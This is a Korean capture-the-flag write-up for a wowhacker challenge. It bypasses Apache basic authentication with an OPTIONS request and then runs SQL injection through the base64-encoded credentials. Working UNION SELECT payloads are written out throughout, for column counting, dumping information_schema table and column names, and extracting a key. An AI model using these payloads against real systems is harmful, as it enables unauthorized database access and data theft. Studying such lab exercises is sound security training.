[wowhacker] 7번(AuThWithMySQL)

[사이트 접속시 Apache 인증 요구하는 AuThWithMySQL/index.html 페이지 공략]

[인증 우회를 위해 HTTP Method Get-> Options와 동시에 Leo/1234로 로그인]

사이트의 인증값(아이디/비밀번호)을 base64 encoding되어서 인증 값으로 쓰는 것 확인함
TGVvOjEyMzQ=  //  Leo:1234
 

ID 칸에 쿼터를 넣고 base64 암호화 해서 보내면 mysql 오류 발생(sql injection) 

필드 수를 알아 내기 위해 하나씩 늘려서 시도

Leo'union select '1'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScjOjEyMzQ=

Leo'union select '1','2'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInIzoxMjM0

Leo'union select '1','2','3'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJyM6MTIzNA==

Leo'union select '1','2','3','4'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywnNCcjOjEyMzQ=

Leo'union select '1','2','3','4','5'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywnNCcsJzUnIzoxMjM0

Leo'union select '1','2','3','4','5','6'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywnNCcsJzUnLCc2JyM6MTIzNA==

6번째에서 성공

address 칸에 필드명을 불러옴

Leo'union select '1','2','3',(select group_concat(table_name) from information_schema.tables),'5','6'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBm
cm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMpLCc1JywnNicjOjEyMzQ=

 

# address: 

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVI
LEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLE
S,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,keytable,user_info

keytable 이라는 table이 의심스러움
해당 테이블 열람

Leo'union select '1','2','3',(select group_concat(column_name) from information_schema.columns where table_name='keytable'),'5','6'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJ
vbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdrZXl0YWJsZScpLCc1JywnNic
jOjEyMzQ=

# address: no,value 

Leo'union select '1','2','3',(select value from keytable limit 0,1),'5','6'#:1234

TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywoc2VsZWN0IHZhbHVlIGZyb20ga2V5dGFibGUgbGltaXQgMCwx
KSwnNScsJzYnIzoxMjM0 

 

Key 획득
address: If you dream it, you can do it